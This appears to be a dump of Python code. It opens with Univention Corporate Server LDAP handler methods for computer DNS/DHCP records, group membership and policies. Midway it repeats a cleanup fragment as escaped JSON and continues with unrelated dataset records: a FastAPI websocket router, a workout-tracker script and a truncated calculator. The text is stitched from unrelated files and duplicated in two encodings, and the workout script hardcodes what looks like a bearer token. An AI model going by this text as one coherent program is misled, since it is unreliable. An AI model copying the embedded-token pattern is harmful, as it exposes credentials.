    freshly created computer object, then update group memberships."""
    super(simpleComputer, self)._ldap_post_create()
    for entry in self.__changes['dhcpEntryZone']['remove']:
        ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: dhcp check: removed: %s' % (entry,))
        dn, ip, mac = self.__split_dhcp_line(entry)
        if not ip and not mac and not self.__multiip:
            # incomplete entry in a single-address setup: fall back to the first MAC
            mac = ''
            if self['mac']:
                mac = self['mac'][0]
            self.__remove_from_dhcp_object(mac=mac)
        else:
            self.__remove_from_dhcp_object(ip=ip, mac=mac)

    for entry in self.__changes['dhcpEntryZone']['add']:
        ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: dhcp check: added: %s' % (entry,))
        dn, ip, mac = self.__split_dhcp_line(entry)
        if not ip and not mac and not self.__multiip:
            # use the computer's own single IP/MAC pair when available
            if len(self['ip']) > 0 and len(self['mac']) > 0:
                self.__modify_dhcp_object(dn, self['mac'][0], ip=self['ip'][0])
        else:
            self.__modify_dhcp_object(dn, mac, ip=ip)

    for entry in self.__changes['dnsEntryZoneForward']['remove']:
        dn, ip = self.__split_dns_line(entry)
        if not ip and not self.__multiip:
            ip = ''
            if self['ip']:
                ip = self['ip'][0]
            self.__remove_dns_forward_object(self['name'], dn, ip)
        else:
            self.__remove_dns_forward_object(self['name'], dn, ip)

    for entry in self.__changes['dnsEntryZoneForward']['add']:
        ud.debug(ud.ADMIN, ud.INFO, 'we should add a dns forward object "%s"' % (entry,))
        dn, ip = self.__split_dns_line(entry)
        ud.debug(ud.ADMIN, ud.INFO, 'changed the object to dn="%s" and ip="%s"' % (dn, ip))
        if not ip and not self.__multiip:
            ud.debug(ud.ADMIN, ud.INFO, 'no multiip environment')
            ip = ''
            if self['ip']:
                ip = self['ip'][0]
            self.__add_dns_forward_object(self['name'], dn, ip)
        else:
            self.__add_dns_forward_object(self['name'], dn, ip)

    for entry in self.__changes['dnsEntryZoneReverse']['remove']:
        dn, ip = self.__split_dns_line(entry)
        if not ip and not self.__multiip:
            ip = ''
            if self['ip']:
                ip = self['ip'][0]
            self.__remove_dns_reverse_object(self['name'], dn, ip)
        else:
            self.__remove_dns_reverse_object(self['name'], dn, ip)

    for entry in self.__changes['dnsEntryZoneReverse']['add']:
        dn, ip = self.__split_dns_line(entry)
        if not ip and not self.__multiip:
            ip = ''
            if self['ip']:
                ip = self['ip'][0]
            self.__add_dns_reverse_object(self['name'], dn, ip)
        else:
            self.__add_dns_reverse_object(self['name'], dn, ip)

    if not self.__multiip and len(self.get('dhcpEntryZone', [])) > 0:
        # single-address host: mirror newly added MACs/IPs into the first DHCP entry
        dn, ip, mac = self['dhcpEntryZone'][0]
        for entry in self.__changes['mac']['add']:
            if len(self['ip']) > 0:
                self.__modify_dhcp_object(dn, entry, ip=self['ip'][0])
            else:
                self.__modify_dhcp_object(dn, entry)
        for entry in self.__changes['ip']['add']:
            if len(self['mac']) > 0:
                self.__modify_dhcp_object(dn, self['mac'][0], ip=entry)

    for entry in self.__changes['dnsEntryZoneAlias']['remove']:
        dnsForwardZone, dnsAliasZoneContainer, alias = entry
        if not alias:
            # nonfunctional code since self[ 'alias' ] should be self[ 'dnsAlias' ], but this case does not seem to occur
            self.__remove_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, self['alias'][0])
        else:
            self.__remove_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, alias)
    for entry in self.__changes['dnsEntryZoneAlias']['add']:
        ud.debug(ud.ADMIN, ud.INFO, 'we should add a dns alias object "%s"' % (entry,))
        dnsForwardZone, dnsAliasZoneContainer, alias = entry
        ud.debug(ud.ADMIN, ud.INFO, 'changed the object to dnsForwardZone [%s], dnsAliasZoneContainer [%s] and alias [%s]' % (dnsForwardZone, dnsAliasZoneContainer, alias))
        if not alias:
            self.__add_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, self['alias'][0])
        else:
            self.__add_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, alias)

    self.update_groups()
def _ldap_post_remove(self):
    """Post-remove hook: queue MAC/IP locks for release and detach this
    computer from all of its groups (including the old primary group)."""
    for macAddress in (self['mac'] or []):
        if macAddress:
            self.alloc.append(('mac', macAddress))
    for ipAddress in (self['ip'] or []):
        if ipAddress:
            self.alloc.append(('aRecord', ipAddress))
    super(simpleComputer, self)._ldap_post_remove()

    # remove computer from groups
    member_uids = [x.decode('UTF-8') for x in self.oldattr.get('uid', [])]
    group_dns = copy.deepcopy(self['groups'])
    if self.oldinfo.get('primaryGroup'):
        group_dns.append(self.oldinfo.get('primaryGroup'))
    for group_dn in group_dns:
        group_obj = univention.admin.objects.get(univention.admin.modules.get('groups/group'), self.co, self.lo, self.position, group_dn)
        group_obj.fast_member_remove([self.dn], member_uids, ignore_license=True)
def __update_groups_after_namechange(self):
    """After a host rename, rewrite memberUid and uniqueMember values in
    every affected group directly via self.lo.modify() (the UDM group
    object cannot be used here, see inline comment)."""
    oldname = self.oldinfo.get('name')
    newname = self.info.get('name')
    if not oldname:
        ud.debug(ud.ADMIN, ud.ERROR, '__update_groups_after_namechange: oldname is empty')
        return

    olddn = self.old_dn.encode('UTF-8')
    newdn = self.dn.encode('UTF-8')

    # machine accounts use the trailing-'$' uid convention
    oldUid = b'%s$' % oldname.encode('UTF-8')
    newUid = b'%s$' % newname.encode('UTF-8')
    ud.debug(ud.ADMIN, ud.INFO, '__update_groups_after_namechange: olddn=%s' % olddn)
    ud.debug(ud.ADMIN, ud.INFO, '__update_groups_after_namechange: newdn=%s' % newdn)

    new_groups = set(self.info.get('groups', []))
    old_groups = set(self.oldinfo.get('groups', []))
    for group in new_groups | old_groups:

        # Using the UDM groups/group object does not work at this point. The computer object has already been renamed.
        # During open() of groups/group each member is checked if it exists. Because the computer object with "olddn" is missing,
        # it won't show up in groupobj['hosts']. That's why the uniqueMember/memberUid updates is done directly via
        # self.lo.modify()

        oldMemberUids = self.lo.getAttr(group, 'memberUid')
        newMemberUids = copy.deepcopy(oldMemberUids)
        if group in new_groups:
            # group is kept: swap old uid for new uid
            ud.debug(ud.ADMIN, ud.INFO, '__update_groups_after_namechange: changing memberUid in grp=%s' % (group,))
            if oldUid in newMemberUids:
                newMemberUids.remove(oldUid)
            if newUid not in newMemberUids:
                newMemberUids.append(newUid)
            self.lo.modify(group, [('memberUid', oldMemberUids, newMemberUids)])
        else:
            # group was left: remove only the single old uid value
            ud.debug(ud.ADMIN, ud.INFO, '__update_groups_after_namechange: removing memberUid from grp=%s' % (group,))
            if oldUid in oldMemberUids:
                oldMemberUids = oldUid
                newMemberUids = b''
                self.lo.modify(group, [('memberUid', oldMemberUids, newMemberUids)])

        # we are doing the uniqueMember seperately because of a potential refint overlay that already changed the dn for us
        oldUniqueMembers = self.lo.getAttr(group, 'uniqueMember')
        newUniqueMembers = copy.deepcopy(oldUniqueMembers)
        if group in new_groups:
            ud.debug(ud.ADMIN, ud.INFO, '__update_groups_after_namechange: changing uniqueMember in grp=%s' % (group,))
            if olddn in newUniqueMembers:
                newUniqueMembers.remove(olddn)
            if newdn not in newUniqueMembers:
                newUniqueMembers.append(newdn)
            self.lo.modify(group, [('uniqueMember', oldUniqueMembers, newUniqueMembers)])
        else:
            if olddn in oldUniqueMembers:
                ud.debug(ud.ADMIN, ud.INFO, '__update_groups_after_namechange: removing uniqueMember from grp=%s' % (group,))
                oldUniqueMembers = olddn
                newUniqueMembers = b''
                self.lo.modify(group, [('uniqueMember', oldUniqueMembers, newUniqueMembers)])
            # NOTE(review): if the branch above ran, oldUniqueMembers is now a
            # bytes value, so this membership test becomes a substring check
            # against olddn rather than a list lookup — looks like a latent
            # bug; confirm against the group schema before changing.
            if newdn in oldUniqueMembers:
                ud.debug(ud.ADMIN, ud.INFO, '__update_groups_after_namechange: removing uniqueMember from grp=%s' % (group,))
                oldUniqueMembers = newdn
                newUniqueMembers = b''
                self.lo.modify(group, [('uniqueMember', oldUniqueMembers, newUniqueMembers)])
def update_groups(self):  # type: () -> None
    """Synchronize the 'hosts' member list of every group this computer
    joined or left (including primary group changes)."""
    if not self.hasChanged('groups') and not self.oldPrimaryGroupDn and not self.newPrimaryGroupDn:
        return
    ud.debug(ud.ADMIN, ud.INFO, 'updating groups')

    old_groups = DN.set(self.oldinfo.get('groups', []))
    new_groups = DN.set(self.info.get('groups', []))

    if self.oldPrimaryGroupDn:
        old_groups += DN.set([self.oldPrimaryGroupDn])

    if self.newPrimaryGroupDn:
        new_groups.add(DN(self.newPrimaryGroupDn))

    # prevent machineAccountGroup from being removed
    if self.has_property('machineAccountGroup'):
        machine_account_group = DN.set([self['machineAccountGroup']])
        new_groups += machine_account_group
        old_groups -= machine_account_group

    # symmetric difference: only groups whose membership actually changed
    for group in old_groups ^ new_groups:
        groupdn = str(group)
        groupObject = univention.admin.objects.get(univention.admin.modules.get('groups/group'), self.co, self.lo, self.position, groupdn)
        groupObject.open()
        # add this computer to the group
        hosts = DN.set(groupObject['hosts'])
        if group not in new_groups:
            # remove this computer from the group
            hosts.discard(DN(self.old_dn))
        else:
            hosts.add(DN(self.dn))
        groupObject['hosts'] = list(DN.values(hosts))
        groupObject.modify(ignore_license=True)

def primary_group(self):  # type: () -> None
    """Write gidNumber (and sambaPrimaryGroupSID when the samba option is
    active) of the newly selected primary group to this computer."""
    if not self.hasChanged('primaryGroup'):
        return
    ud.debug(ud.ADMIN, ud.INFO, 'updating primary groups')

    primaryGroupNumber = self.lo.getAttr(self['primaryGroup'], 'gidNumber', required=True)
    self.newPrimaryGroupDn = self['primaryGroup']
    self.lo.modify(self.dn, [('gidNumber', b'None', primaryGroupNumber[0])])

    if 'samba' in self.options:
        primaryGroupSambaNumber = self.lo.getAttr(self['primaryGroup'], 'sambaSID', required=True)
        self.lo.modify(self.dn, [('sambaPrimaryGroupSID', b'None', primaryGroupSambaNumber[0])])
def cleanup(self):  # type: () -> None
    """Best-effort removal of every DNS/DHCP artefact referring to this
    computer: forward/reverse records, DHCP entries, aliases, plus stale
    nameserver, A and SRV/host records in the configured zones. Each step
    logs and continues on failure instead of aborting the removal."""
    self.open()
    if self['dnsEntryZoneForward']:
        for dnsEntryZoneForward in self['dnsEntryZoneForward']:
            dn, ip = self.__split_dns_line(dnsEntryZoneForward)
            try:
                # ip=None removes the host record regardless of its addresses
                self.__remove_dns_forward_object(self['name'], dn, None)
            except Exception as e:
                ud.debug(ud.ADMIN, ud.WARN, 'dnsEntryZoneForward.delete(%s): %s' % (dnsEntryZoneForward, e))

    if self['dnsEntryZoneReverse']:
        for dnsEntryZoneReverse in self['dnsEntryZoneReverse']:
            dn, ip = self.__split_dns_line(dnsEntryZoneReverse)
            try:
                self.__remove_dns_reverse_object(self['name'], dn, ip)
            except Exception as e:
                ud.debug(ud.ADMIN, ud.WARN, 'dnsEntryZoneReverse.delete(%s): %s' % (dnsEntryZoneReverse, e))

    if self['dhcpEntryZone']:
        for dhcpEntryZone in self['dhcpEntryZone']:
            dn, ip, mac = self.__split_dhcp_line(dhcpEntryZone)
            try:
                self.__remove_from_dhcp_object(mac=mac)
            except Exception as e:
                ud.debug(ud.ADMIN, ud.WARN, 'dhcpEntryZone.delete(%s): %s' % (dhcpEntryZone, e))

    if self['dnsEntryZoneAlias']:
        for entry in self['dnsEntryZoneAlias']:
            dnsForwardZone, dnsAliasZoneContainer, alias = entry
            try:
                self.__remove_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, alias)
            except Exception as e:
                ud.debug(ud.ADMIN, ud.WARN, 'dnsEntryZoneAlias.delete(%s): %s' % (entry, e))

    # remove service record entries (see Bug #26400)
    ud.debug(ud.ADMIN, ud.INFO, '_ldap_post_remove: clean up service records, host records, and IP address saved at the forward zone')
    ips = set(self['ip'] or [])
    fqdn = self['fqdn']
    fqdnDot = '%s.' % fqdn  # we might have entries w/ or w/out trailing '.'

    # iterate over all reverse zones
    for zone in self['dnsEntryZoneReverse'] or []:
        # load zone object
        ud.debug(ud.ADMIN, ud.INFO, 'clean up entries for zone: %s' % zone)
        if len(zone) < 1:
            continue
        zoneObj = univention.admin.objects.get(
            univention.admin.modules.get('dns/reverse_zone'), self.co, self.lo, self.position, dn=zone[0])
        zoneObj.open()

        # clean up nameserver records
        if 'nameserver' in zoneObj and fqdnDot in zoneObj['nameserver']:
            ud.debug(
                ud.ADMIN,
                ud.INFO,
                'removing %s from dns zone %s' % (fqdnDot, zone[0]))
            # nameserver is required in reverse zone
            if len(zoneObj['nameserver']) > 1:
                zoneObj['nameserver'].remove(fqdnDot)
                zoneObj.modify()

    # iterate over all forward zones
    for zone in self['dnsEntryZoneForward'] or []:
        # load zone object
        ud.debug(ud.ADMIN, ud.INFO, 'clean up entries for zone: %s' % zone)
        if len(zone) < 1:
            continue
        zoneObj = univention.admin.objects.get(
            univention.admin.modules.get('dns/forward_zone'), self.co, self.lo, self.position, dn=zone[0])
        zoneObj.open()
        ud.debug(ud.ADMIN, ud.INFO, 'zone aRecords: %s' % zoneObj['a'])

        zone_obj_modified = False
        # clean up nameserver records
        if 'nameserver' in zoneObj and fqdnDot in zoneObj['nameserver']:
            ud.debug(
                ud.ADMIN,
                ud.INFO,
                'removing %s from dns zone %s' % (fqdnDot, zone))
            # nameserver is required in forward zone
            if len(zoneObj['nameserver']) > 1:
                zoneObj['nameserver'].remove(fqdnDot)
                zone_obj_modified = True

        # clean up aRecords of zone itself
        new_entries = list(set(zoneObj['a']) - ips)
        if len(new_entries) != len(zoneObj['a']):
            ud.debug(
                ud.ADMIN,
                ud.INFO,
                'Clean up zone records:\n%s ==> %s' % (zoneObj['a'], new_entries))
            zoneObj['a'] = new_entries
            zone_obj_modified = True

        if zone_obj_modified:
            zoneObj.modify()

        # clean up service records
        for irecord in univention.admin.modules.lookup('dns/srv_record', self.co, self.lo, base=self.lo.base, scope='sub', superordinate=zoneObj):
            irecord.open()
            # drop locations that mention this host in any form
            new_entries = [j for j in irecord['location'] if fqdn not in j and fqdnDot not in j]
            if len(new_entries) != len(irecord['location']):
                ud.debug(ud.ADMIN, ud.INFO, 'Entry found in "%s":\n%s ==> %s' % (irecord.dn, irecord['location'], new_entries))
                irecord['location'] = new_entries
                irecord.modify()

        # clean up host records (that should probably be done correctly by Samba4)
        for irecord in univention.admin.modules.lookup('dns/host_record', self.co, self.lo, base=self.lo.base, scope='sub', superordinate=zoneObj):
            irecord.open()
            new_entries = list(set(irecord['a']) - ips)
            if len(new_entries) != len(irecord['a']):
                ud.debug(ud.ADMIN, ud.INFO, 'Entry found in "%s":\n%s ==> %s' % (irecord.dn, irecord['a'], new_entries))
                irecord['a'] = new_entries
                irecord.modify()
base=self.lo.base, scope='sub', superordinate=zoneObj):\n irecord.open()\n new_entries = [j for j in irecord['location'] if fqdn not in j and fqdnDot not in j]\n if len(new_entries) != len(irecord['location']):\n ud.debug(ud.ADMIN, ud.INFO, 'Entry found in \"%s\":\\n%s ==> %s' % (irecord.dn, irecord['location'], new_entries))\n irecord['location'] = new_entries\n irecord.modify()\n\n # clean up host records (that should probably be done correctly by Samba4)\n for irecord in univention.admin.modules.lookup('dns/host_record', self.co, self.lo, base=self.lo.base, scope='sub', superordinate=zoneObj):\n irecord.open()\n new_entries = list(set(irecord['a']) - ips)\n if len(new_entries) != len(irecord['a']):\n ud.debug(ud.ADMIN, ud.INFO, 'Entry found in \"%s\":\\n%s ==> %s' % (irecord.dn, irecord['a'], new_entries))\n irecord['a'] = new_entries\n irecord.modify()\n\n def __setitem__(self, key, value):\n raise_after = None\n\n ips = [ip for ip in self['ip'] if ip] if self.has_property('ip') and self['ip'] else []\n ip1 = self['ip'][0] if len(ips) == 1 else ''\n macs = [mac for mac in self['mac'] if mac] if self.has_property('mac') and self['mac'] else []\n mac1 = self['mac'][0] if len(macs) == 1 else ''\n\n if key == 'network':\n if self.old_network != value and value and value != 'None':\n network_object = univention.admin.handlers.networks.network.object(self.co, self.lo, self.position, value)\n network_object.open()\n subnet = ip_network(u\"%(network)s/%(netmask)s\" % network_object, strict=False)\n\n if not ips or ip_address(u'%s' % (ip1,)) not in subnet:\n if self.ip_freshly_set:\n raise_after = univention.admin.uexceptions.ipOverridesNetwork\n else:\n # get next IP\n network_object.refreshNextIp()\n self['ip'] = network_object['nextIp']\n ips = [ip for ip in self['ip'] if ip] if self.has_property('ip') and self['ip'] else []\n ip1 = self['ip'][0] if len(ips) == 1 else ''\n try:\n self.ip = self.request_lock('aRecord', self['ip'][0])\n self.ip_alredy_requested = 
True\n except univention.admin.uexceptions.noLock:\n pass\n\n self.network_object = network_object\n if network_object['dnsEntryZoneForward'] and ip1:\n self['dnsEntryZoneForward'] = [[network_object['dnsEntryZoneForward'], ip1]]\n if network_object['dnsEntryZoneReverse'] and ip1:\n self['dnsEntryZoneReverse'] = [[network_object['dnsEntryZoneReverse'], ip1]]\n if network_object['dhcpEntryZone']:\n if ip1 and mac1:\n self['dhcpEntryZone'] = [(network_object['dhcpEntryZone'], ip1, mac1)]\n else:\n self.__saved_dhcp_entry = network_object['dhcpEntryZone']\n\n self.old_network = value\n\n elif key == 'ip':\n self.ip_freshly_set = True\n if not self.ip or self.ip != value:\n if self.ip_alredy_requested:\n univention.admin.allocators.release(self.lo, self.position, 'aRecord', self.ip)\n self.ip_alredy_requested = 0\n if value and self.network_object:\n if self.network_object['dnsEntryZoneForward'] and ip1:\n self['dnsEntryZoneForward'] = [[self.network_object['dnsEntryZoneForward'], ip1]]\n if self.network_object['dnsEntryZoneReverse'] and ip1:\n self['dnsEntryZoneReverse'] = [[self.network_object['dnsEntryZoneReverse'], ip1]]\n if self.network_object['dhcpEntryZone']:\n if ip1 and macs:\n self['dhcpEntryZone'] = [(self.network_object['dhcpEntryZone'], ip1, mac1)]\n else:\n self.__saved_dhcp_entry = self.network_object['dhcpEntryZone']\n if not self.ip:\n self.ip_freshly_set = False\n\n elif key == 'mac' and self.__saved_dhcp_entry and ip1 and macs:\n if isinstance(value, list):\n self['dhcpEntryZone'] = [(self.__saved_dhcp_entry, ip1, value[0])]\n else:\n self['dhcpEntryZone'] = [(self.__saved_dhcp_entry, ip1, value)]\n\n super(simpleComputer, self).__setitem__(key, value)\n if raise_after:\n raise raise_after\n\n\nclass simplePolicy(simpleLdap):\n\n def __init__(self, co, lo, position, dn='', superordinate=None, attributes=[]):\n self.resultmode = 0\n\n if not hasattr(self, 'cloned'):\n self.cloned = None\n\n if not hasattr(self, 'changes'):\n self.changes = 0\n\n if 
not hasattr(self, 'policy_attrs'):\n self.policy_attrs = {}\n\n if not hasattr(self, 'referring_object_dn'):\n self.referring_object_dn = None\n\n simpleLdap.__init__(self, co, lo, position, dn, superordinate, attributes)\n\n def _ldap_post_remove(self):\n super(simplePolicy, self)._ldap_post_remove()\n for object_dn in self.lo.searchDn(filter_format('univentionPolicyReference=%s', [self.dn])):\n try:\n self.lo.modify(object_dn, [('univentionPolicyReference', self.dn.encode('UTF-8'), None)])\n except (univention.admin.uexceptions.base, ldap.LDAPError) as exc:\n ud.debug(ud.ADMIN, ud.ERROR, 'Could not remove policy reference %r from %r: %s' % (self.dn, object_dn, exc))\n\n def copyIdentifier(self, from_object):\n \"\"\"Activate the result mode and set the referring object\"\"\"\n self.resultmode = 1\n for key, property in from_object.descriptions.items():\n if property.identifies:\n for key2, property2 in self.descriptions.items():\n if property2.identifies:\n self.info[key2] = from_object.info[key]\n self.referring_object_dn = from_object.dn\n if not self.referring_object_dn:\n self.referring_object_dn = from_object.position.getDn()\n self.referring_object_position_dn = from_object.position.getDn()\n\n def clone(self, referring_object):\n \"\"\"\n Marks the object as a not existing one containing values\n retrieved by evaluating the policies for the given object\n \"\"\"\n self.cloned = self.dn\n self.dn = ''\n self.copyIdentifier(referring_object)\n\n def getIdentifier(self):\n # type: () -> str\n for key, property in self.descriptions.items():\n if property.identifies and key in self.info and self.info[key]:\n return key\n raise ValueError()\n\n def __makeUnique(self):\n identifier = self.getIdentifier()\n components = self.info[identifier].split(\"_uv\")\n if len(components) > 1:\n try:\n n = int(components[1])\n n += 1\n except ValueError:\n n = 1\n else:\n n = 0\n self.info[identifier] = \"%s_uv%d\" % (components[0], n)\n ud.debug(ud.ADMIN, ud.INFO, 
'simplePolicy.__makeUnique: result: %s' % self.info[identifier])\n\n def create(self, serverctrls=None, response=None):\n if not self.resultmode:\n return super(simplePolicy, self).create(serverctrls=serverctrls, response=response)\n\n self._exists = False\n try:\n self.oldinfo = {}\n dn = super(simplePolicy, self).create(serverctrls=serverctrls, response=response)\n ud.debug(ud.ADMIN, ud.INFO, 'simplePolicy.create: created object: info=%s' % (self.info))\n except univention.admin.uexceptions.objectExists:\n self.__makeUnique()\n dn = self.create()\n return dn\n\n def policy_result(self, faked_policy_reference=None):\n \"\"\"\n This method retrieves the policy values currently effective\n for this object. If the 'resultmode' is not active the evaluation\n is cancelled.\n\n If faked_policy_reference is given at the top object\n (referring_object_dn) this policy object temporarily referenced.\n\n faked_policy_reference can be a string or a list of strings.\n \"\"\"\n if not self.resultmode:\n return\n\n self.polinfo_more = {}\n if not self.policy_attrs:\n policies = []\n if isinstance(faked_policy_reference, (list, tuple)):\n policies.extend(faked_policy_reference)\n elif faked_policy_reference:\n policies.append(faked_policy_reference)\n\n self.__load_policies(policies)\n\n if hasattr(self, '_custom_policy_result_map'):\n self._custom_policy_result_map()\n else:\n values = {}\n for attr_name, value_dict in self.policy_attrs.items():\n value_dict = copy.deepcopy(value_dict)\n values[attr_name] = copy.copy(value_dict['value'])\n value_dict['value'] = [x.decode('UTF-8') for x in value_dict['value']]\n self.polinfo_more[self.mapping.unmapName(attr_name)] = value_dict\n\n self.polinfo = univention.admin.mapping.mapDict(self.mapping, values)\n self.polinfo = self._post_unmap(self.polinfo, values)\n\n def __load_policies(self, policies=None):\n if not self.policy_attrs:\n # the referring object does not exist yet\n if self.referring_object_dn != 
self.referring_object_position_dn:\n result = self.lo.getPolicies(self.lo.parentDn(self.referring_object_dn), policies=policies)\n else:\n result = self.lo.getPolicies(self.referring_object_position_dn, policies=policies)\n for policy_oc, attrs in result.items():\n if univention.admin.objects.ocToType(policy_oc) == self.module:\n self.policy_attrs = attrs\n\n def __getitem__(self, key):\n if not self.resultmode:\n if self.has_property('emptyAttributes') and self.mapping.mapName(key) and self.mapping.mapName(key) in simpleLdap.__getitem__(self, 'emptyAttributes'):\n ud.debug(ud.ADMIN, ud.INFO, 'simplePolicy.__getitem__: empty Attribute %s' % key)\n if self.descriptions[key].multivalue:\n return []\n else:\n return ''\n return simpleLdap.__getitem__(self, key)\n\n self.policy_result()\n\n if (key in self.polinfo and not (key in self.info or key in self.oldinfo)) or (key in self.polinfo_more and 'fixed' in self.polinfo_more[key] and self.polinfo_more[key]['fixed']):\n if self.descriptions[key].multivalue and not isinstance(self.polinfo[key], list):\n # why isn't this correct in the first place?\n self.polinfo[key] = [self.polinfo[key]]\n ud.debug(ud.ADMIN, ud.INFO, 'simplePolicy.__getitem__: presult: %s=%s' % (key, self.polinfo[key]))\n return self.polinfo[key]\n\n result = simpleLdap.__getitem__(self, key)\n ud.debug(ud.ADMIN, ud.INFO, 'simplePolicy.__getitem__: result: %s=%s' % (key, result))\n return result\n\n def fixedAttributes(self):\n # type: () -> Dict[str, bool]\n \"\"\"Return effectively fixed attributes.\"\"\"\n if not self.resultmode:\n return {}\n\n self.__load_policies(None)\n return {\n self.mapping.unmapName(attr_name): value_dict.get('fixed', False)\n for attr_name, value_dict in self.policy_attrs.items()\n }\n\n def emptyAttributes(self):\n # type: () -> Dict[str, bool]\n \"\"\"return effectively empty attributes.\"\"\"\n if not self.has_property('emptyAttributes'):\n return {}\n\n return {\n self.mapping.unmapName(attrib): True\n for attrib in 
simpleLdap.__getitem__(self, 'emptyAttributes') or ()\n }\n\n def __setitem__(self, key, newvalue):\n if not self.resultmode:\n simpleLdap.__setitem__(self, key, newvalue)\n return\n\n self.policy_result()\n\n if key in self.polinfo:\n if self.polinfo[key] != newvalue or self.polinfo_more[key]['policy'] == self.cloned or (key in self.info and self.info[key] != newvalue):\n if self.polinfo_more[key]['fixed'] and self.polinfo_more[key]['policy'] != self.cloned:\n raise univention.admin.uexceptions.policyFixedAttribute(key)\n simpleLdap.__setitem__(self, key, newvalue)\n ud.debug(ud.ADMIN, ud.INFO, 'polinfo: set key %s to newvalue %s' % (key, newvalue))\n if self.hasChanged(key):\n ud.debug(ud.ADMIN, ud.INFO, 'polinfo: key:%s hasChanged' % (key))\n self.changes = 1\n return\n\n # this object did not exist before\n if not self.oldinfo:\n # if this attribute is of type boolean and the new value is equal to the default, than ignore this \"change\"\n if isinstance(self.descriptions[key].syntax, univention.admin.syntax.boolean):\n default = self.descriptions[key].base_default\n if isinstance(self.descriptions[key].base_default, (tuple, list)):\n default = self.descriptions[key].base_default[0]\n if (not default and newvalue == '0') or default == newvalue:\n return\n\n simpleLdap.__setitem__(self, key, newvalue)\n if self.hasChanged(key):\n self.changes = 1\n\n\nclass _MergedAttributes(object):\n \"\"\"Evaluates old attributes and the modlist to get a new representation of the object.\"\"\"\n\n def __init__(self, obj, modlist):\n self.obj = obj\n self.modlist = [x if len(x) == 3 else (x[0], None, x[-1]) for x in modlist]\n self.case_insensitive_attributes = ['objectClass']\n\n def get_attributes(self):\n attributes = set(self.obj.oldattr.keys()) | {x[0] for x in self.modlist}\n return {attr: self.get_attribute(attr) for attr in attributes}\n\n def get_attribute(self, attr):\n values = set(self.obj.oldattr.get(attr, []))\n # evaluate the modlist and apply all changes to the 
current values\n for (att, old, new) in self.modlist:\n if att.lower() != attr.lower():\n continue\n new = [] if not new else [new] if isinstance(new, bytes) else new\n old = [] if not old else [old] if isinstance(old, bytes) else old\n if not old and new: # MOD_ADD\n values |= set(new)\n elif not new and old: # MOD_DELETE\n values -= set(old)\n elif old and new: # MOD_REPLACE\n values = set(new)\n return list(values)\n","repo_name":"univention/univention-corporate-server","sub_path":"management/univention-directory-manager-modules/modules/univention/admin/handlers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":179642,"program_lang":"python","lang":"en","doc_type":"code","stars":166,"dataset":"github-code","pt":"33"} +{"seq_id":"23252672827","text":"from typing import List\n\nfrom fastapi import APIRouter, WebSocket, WebSocketDisconnect\n\nfrom app.music.service import MusicService\n\nrouter = APIRouter()\n\n\nclass ConnectionManager:\n def __init__(self):\n self.active_connectins: List[WebSocket] = []\n\n async def connect(self, websocket: WebSocket):\n await websocket.accept()\n self.active_connectins.append(websocket)\n\n def disconnect(self, websocket: WebSocket):\n self.active_connectins.remove(websocket)\n\n async def send(self, data: bytes, websocket: WebSocket):\n await websocket.send_bytes(data)\n\n async def broadcast(self, data: bytes):\n for connection in self.active_connectins:\n await connection.send_bytes(data)\n\n\nmanager = ConnectionManager()\n\n\n@router.websocket(\"/ws\")\nasync def music(websocket: WebSocket):\n await manager.connect(websocket)\n try:\n while True:\n request = await websocket.receive_json()\n \n try:\n seq = request[\"seq\"]\n except KeyError:\n seq = 0\n \n packet = MusicService.get_next_audio_packet(seq=seq)\n meta = packet.dict()\n meta.pop(\"buffer\")\n\n await websocket.send_json(meta)\n await websocket.send_bytes(packet.buffer)\n \n\n except WebSocketDisconnect:\n 
manager.disconnect(websocket)\n","repo_name":"AramayisO/duxov","sub_path":"backend/api/app/music/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"23549490028","text":"import requests\nfrom requests import api\nimport datetime as dt\n\napp_id = ''\napp_key = ''\nsheety_token = '%'\n\nworkout_endpoint = 'https://trackapi.nutritionix.com/v2/natural/exercise'\nsheety_endpoint = 'https://api.sheety.co/31a86792fd95429388193024970a7b21/workoutTracking/workouts'\n\nheaders = {\n 'x-app-id': app_id,\n 'x-app-key': app_key,\n}\n\nsheety_headers = {\n 'Authorization': 'Bearer NbTqCor7W5FESGB%'\n}\n\nexercise = input('Enter exercise: ')\n\nexercise = {\n \"query\": exercise,\n \"gender\": \"male\",\n \"weight_kg\": 63,\n \"height_cm\": 160,\n \"age\": 22\n}\n\nresponse = requests.post(url=workout_endpoint, json=exercise, headers=headers)\nresult = response.json()\n\ndate_time = dt.datetime.now()\ndate = date_time.strftime('%d %B %Y')\ntime = date_time.strftime('%H:%M')\n\nfor exercise in result['exercises']: \n workout = {\n 'workout': {\n 'date': date,\n 'time': time,\n \"exercise\": exercise[\"name\"].title(),\n \"duration\": str(exercise[\"duration_min\"]),\n \"calories\": exercise[\"nf_calories\"]\n }\n } \n\nresponse = requests.post(url=sheety_endpoint, json=workout, headers=sheety_headers)\n","repo_name":"dainebigham/workout-tracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"35359765562","text":"#print(\"Calculate Area\")\n\n#width = float(input(\"What is the width of the rectangle?\"))\n#height = float(input(\"What is the height of the rectangle?\"))\n\n#print(width * height)\n\n\n\n\n#print(\"Average calculator\")\n#num1 = int(input(\"Enter your first number\"))\n#num2 = 
